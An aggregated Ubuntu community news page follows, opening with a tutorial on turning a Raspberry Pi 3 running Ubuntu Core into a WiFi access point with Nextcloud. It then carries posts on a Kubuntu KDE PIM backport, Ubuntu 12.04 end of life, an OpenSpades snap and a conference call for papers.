ogra@pc~$ mount | grep /dev/sdb # check if anything is mounted
...
ogra@pc~$ sudo umount /dev/sdb1 # unmount the partition
ogra@pc~$ sudo umount /dev/sdb2
ogra@pc~$ 

Use the following command to write the image to the card:

ogra@pc~$ xzcat /path/to/ubuntu-core-16-pi3.img.xz | sudo dd of=/dev/sdb bs=8M
ogra@pc~$ 

Plug the SD into your pi3, plug an ethernet cable and either a serial cable or a monitor and keyboard in and power up the board. Eventually you will se a “Please press enter” message on the screen, hitting Enter will start the installer.

Going through the installer …

Configure eth0 as default interface (the WLAN driver is broken in the current pi3 installer. Simply ignore the wlan0 device at this point):

Give your login.ubuntu.com account info so the system can set up your ssh login:

The last screen of the installer will tell you the ssh credentials to use:

Ssh into the board, set a hostname and call sudo reboot (to work around the WLAN breakage):

ogra@pc:~$ ssh ogra@192.168.2.82

...
It's a brave new world here in Snappy Ubuntu Core! This machine
does not use apt-get or deb packages. Please see 'snap --help'
for app installation and transactional updates.

ogra@localhost:~$ sudo hostnamectl set-hostname pi3
ogra@localhost:~$ sudo reboot

Now that we have installed our basic system, we are ready to add some nice application snaps to turn it into a shiny WiFi AP with a personal cloud to use from our phone and desktop systems.

Install and set up your personal WiFi Accesspoint:

ogra@pi3:~$ snap install wifi-ap
ogra@pi3:~$ sudo wifi-ap.setup-wizard
Automatically selected only available wireless network interface wlan0 
Which SSID you want to use for the access point: UbuntuCore 
Do you want to protect your network with a WPA2 password instead of staying open for everyone? (y/n) y 
Please enter the WPA2 passphrase: 1234567890 
Insert the Access Point IP address: 192.168.1.1 
How many host do you want your DHCP pool to hold to? (1-253) 50 
Do you want to enable connection sharing? (y/n) y 
Which network interface you want to use for connection sharing? Available are sit0, eth0: eth0 
Do you want to enable the AP now? (y/n) y 
In order to get the AP correctly enabled you have to restart the backend service:
 $ systemctl restart snap.wifi-ap.backend 
2017/04/29 10:54:56 wifi.address=192.168.1.1 
2017/04/29 10:54:56 wifi.netmask=ffffff00 
2017/04/29 10:54:56 share.disabled=false 
2017/04/29 10:54:56 wifi.ssid=Snappy 
2017/04/29 10:54:56 wifi.security=wpa2 
2017/04/29 10:54:56 wifi.security-passphrase=1234567890 
2017/04/29 10:54:56 disabled=false 
2017/04/29 10:54:56 dhcp.range-start=192.168.1.2 
2017/04/29 10:54:56 dhcp.range-stop=192.168.1.51 
2017/04/29 10:54:56 share.network-interface=eth0 
Configuration applied succesfully 
ogra@pi3:~$

Set up an USB key as permanently mounted disk:

Plug your USB Disk/Key into the Pi3 and immediately call the dmesg command afterwards so you can see the name of the device and its partitions … (in my case the device name is /dev/sda and there is a vfat partition on the device called /dev/sda1)

Now create /etc/systemd/system/media-usbdisk.mount with the following content:

[Unit] 
Description=Mount USB Disk

[Mount]
What=/dev/sda1 
Where=/media/usbdisk 
Options=defaults 

[Install] 
WantedBy=multi-user.target

And enable it:

ogra@pi3:~$ sudo systemctl daemon-reload 
ogra@pi3:~$ sudo systemctl enable media-usbdisk.mount 
ogra@pi3:~$ sudo systemctl start media-usbdisk.mount 
ogra@pi3:~$

Install the nextcloud snap:

ogra@pi3:~$ snap install nextcloud 
ogra@pi3:~$

Allow nextcloud to access devices in /media:

ogra@pi3:~$ snap connect nextcloud:removable-media 
ogra@pi3:~$

Wait a bit, nextclouds auto setup takes a few minutes (make some tea or coffee) …

Turn on https:

ogra@pi3:~$ sudo nextcloud.enable-https self-signed 
Generating key and self-signed certificate... done 
Restarting apache... done 
ogra@pi3:~$

Now you can connect to your new WiFi AP SSID and point your browser to https://192.168.1.1/ afterwards.

Add an exception for the self signed security cert (note that nextcloud.enable-https also accepts Let’s Encrypt certs in case you own one, just call “sudo nextcloud.enable-https -h” to get all info) and configure nextcloud via the web UI.

In the nextcloud UI install the “External Storage Support” from the app section and create a new local Storage pointing to the /media/usbdisk dir so your users can store thier files on the external disk.


Kubuntu General News: KDE PIM update now available for Zesty Zapus 17.04

$
0
0

As explained in our call for testing post,  we missed by a whisker getting updated PIM 16.12.3 (kontact, kmail, akregator, kgpg etc..) into Zesty for release day, and we believe it is important that our users have access to this significant update.

Therefore packages for PIM 16.12.3 release are now available in the Kubuntu backports PPAs.

While we believe these packages should be relatively issue-free, please bear in mind that they have not been tested as comprehensively as those in the main ubuntu archive.

Should any issues occur,  please provide feedback on our mailing list [1], IRC [2], file a bug against our PPA packages [3], or optionally via social media.

Reading about how to use PPA purge is also advisable.

How to install KDE PIM 16.12.3 packages for Zesty:

To better serve the varied needs of our users, these updates have been provided in 2 separate PPAs.

Which of the two you add to your system depends on your preference for receiving further updates of other backported releases of KDE software.

User case 1 –  A user who wants to update to PIM 16.12.3, who is happy to add the main backports ppa, and is happy to receive further updates/backports of other applications (plasma, KDE applications, frameworks, digikam, krita etc..) through this backports PPA.

In a console run:

sudo add-apt-repository ppa:kubuntu-ppa/backports

User case 2– A user who generally wants to use the default Zesty archive packages, but is missing the update to PIM 16.12.3 and would like to add just this.

In a console run:

sudo add-apt-repository ppa:kubuntu-ppa/backports-pim

In both cases, users should run after adding the PPA:

sudo apt-get update
sudo apt-get dist-upgrade

to complete the upgrade.

Notes: It is expected that on most systems the upgrade will ask to remove a few old libraries and obsolete packages. This is normal and required to make way for new versions, and cases where old packages have been split into several new ones in the new KDE PIM release.

Other upgrade methods (Discover/Muon etc) could be used after adding the PPA, but to ensure packages are upgraded and replaced as intended, upgrading via the command line with the above command is the preferred option.

We hope you enjoy the update.

Kubuntu Team.

1. Kubuntu-devel mailing list: https://lists.ubuntu.com/mailman/listinfo/kubuntu-devel
2. Kubuntu IRC channels: #kubuntu & #kubuntu-devel on irc.freenode.net
3. Kubuntu ppa bugs: https://bugs.launchpad.net/kubuntu-ppa

The Fridge: Ubuntu 12.04 (Precise Pangolin) End of Life reached on April 28, 2017

$
0
0

This is a follow-up to the End of Life warning sent last month to confirm that as of today (April 28, 2017), Ubuntu 12.04 is no longer generally supported. No more package updates will be accepted to the 12.04 primary archive, and it will be copied for archival to old-releases.ubuntu.com in the coming weeks.

However, we will again remind you that for customers who can’t upgrade immediately, Canonical is offering Extended Security Support for Ubuntu Advantage customers, more info about which can be found here:

The original End of Life warning follows, with upgrade instructions:

Ubuntu announced its 12.04 (Precise Pangolin) release almost 5 years ago, on April 26, 2012. As with the earlier LTS releases, Ubuntu committed to ongoing security and critical fixes for a period of 5 years. The support period is now nearing its end and Ubuntu 12.04 will reach end of life on Friday, April 28th. At that time, Ubuntu Security Notices will no longer include information or updated packages for Ubuntu 12.04.

The supported upgrade path from Ubuntu 12.04 is via Ubuntu 14.04. Users are encouraged to evaluate and upgrade to our latest 16.04 LTS release via 14.04. Instructions and caveats for the upgrades may be found at https://help.ubuntu.com/community/TrustyUpgrades and https://help.ubuntu.com/community/XenialUpgrades. Ubuntu 14.04 and 16.04 continue to be actively supported with security updates and select high-impact bug fixes. All announcements of official security updates for Ubuntu releases are sent to the ubuntu-security-announce mailing list, information about which may be found at:

https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce

For users who can’t upgrade immediately, Canonical has just announced an extended support package for Ubuntu Advantage customers, which will keep delivering security updates while you evaluate your upgrades to newer releases. The announcement, with details about how and where to purchase extended support, can be found at:

https://lists.ubuntu.com/archives/ubuntu-announce/2017-March/000217.html

Since its launch in October 2004 Ubuntu has become one of the most highly regarded Linux distributions with millions of users in homes, schools, businesses and governments around the world. Ubuntu is Open Source software, costs nothing to download, and users are free to customise or alter their software in order to meet their needs.

Originally posted to the ubuntu-announce mailing list on Fri Apr 28 23:22:24 UTC 2017 by Adam Conrad, on behalf of the Ubuntu Release Team

Alan Pope: OpenSpades Snap - pew pew

$
0
0

OpenSpades is a super-fun "Open-Source Voxel First Person Shooter". I've been playing it for a while both on my GameOS desktop and under WINE on Linux. For whatever reason the upstream OpenSpades on github project had no Linux builds available for download, and I was lazy so I used WINE, which worked just fine.

This weekend though I decided to fix that. So I made a snap of it and pushed it to the store. If you're on a Linux distro which supports snaps you can install it with one command:-

snap install openspades

That will install the current stable release of openspades - 0.1.1c. If you'd rather test the latest github master build (as of yesterday) then use:-

snap install openspades --edge

Note: OpenSpades needs a fairly decent video card. My poor Thinkpad T450 with its integrated Intel GPU isn't up to the job, so the game switches to software rendering. However on my more beefy nVidia-powered desktop, it uses the GPU for OpenGL funky stuff.

OpenSpades on Ubuntu

I tested this build on Ubuntu 16.04, Debian 9, elementary OS Loki, Lubuntu (i386), Fedora 25 and OpenSUSE Tumbleweed. One snap(*), lots of distros. Yeah baby! :D

OpenSpades on OpenSUSE Tumbleweed

OpenSpades on Fedora 25

OpenSpades on Debian 9

(*) Technically four snaps. One per arch (32/64-bit) and one per release (stable/edge).

I proposed my changes upstream to the OpenSpades project.

I used Launchpad to build the binaries for stable and edge on both i386 and amd64 architectures, for free. Thanks Canonical!

I had to do a couple of interesting things to make OpenSpades work nicely across all these systems. I bundled in a few libraries, and wrapped the launching of the game in a script which sets up some environment variables. I just copy and pasted that part from other projects I've done in the past.

The only slightly kludgy thing I did was copy the Resources directory into a writable directory and modify the default configuration for first-launch. OpenSpades has an 'update check' feature which looks for game updates online, but it seems to me this doesn't work on Linux - probably due to there being no binary builds currently available. So rather than the user getting prompted to enable this feature, I enabled it by default, so the user just gets a notification that they're on the latest version, rather than being asked to enable a feature that won't work anyway. With snaps the user will get an update as soon as it's pushed to the store, so no need for the in-app update mechanism I think.

I also had to disable EAX (positional audio) because it crashes OpenAL on the i386 builds. Players on AMD64 systems can of course just re-enable this, as it's only the default I set, not permanently off. I might modify this default so it's only disabled on i386 builds in future.

So if you're in need of something fun to play on your Linux system. Give OpenSpades a try, and let me know if you get any problems with the snap!

Pew pew!

Jono Bacon: Open Community Conference CFP Closes This Week

$
0
0

This coming weekend is the Community Leadership Summit in Austin (I hope to see you all there!), but there is another event I am running which you need to know about.

The Open Community Conference is one of the four main events that is part of the Open Source Summit in Los Angeles from 11th – 13th September 2017. A little while ago the Linux Foundation and I started exploring running a new conference as part of their Open Source Summit, and this has culminated in the Open Community Conference.

The goals of the event are simple: to provide presentations, panels, and networking that share community management and leadership best practice in a practical and applicable way. My main goal is to provide a set of speakers who have built great communities, either internally or externally, and have them share their insights.

This is different to the Community Leadership Summit: CLS is a set of discussions designed for community managers. The Open Community Conference is a traditional conference with presentations, panels, and more in which methods, approaches, case-studies, and more is shared, and designed for a broader audience.

Call For Papers

If you have built community in the open source world, or have built internal communities using open source methodologies, I would love to have you submit a paper by clicking here. The call for papers closes THIS WEEK on 6th May 2017, so get them in!

The post Open Community Conference CFP Closes This Week appeared first on Jono Bacon.

Viewing all 17727 articles
Browse latest View live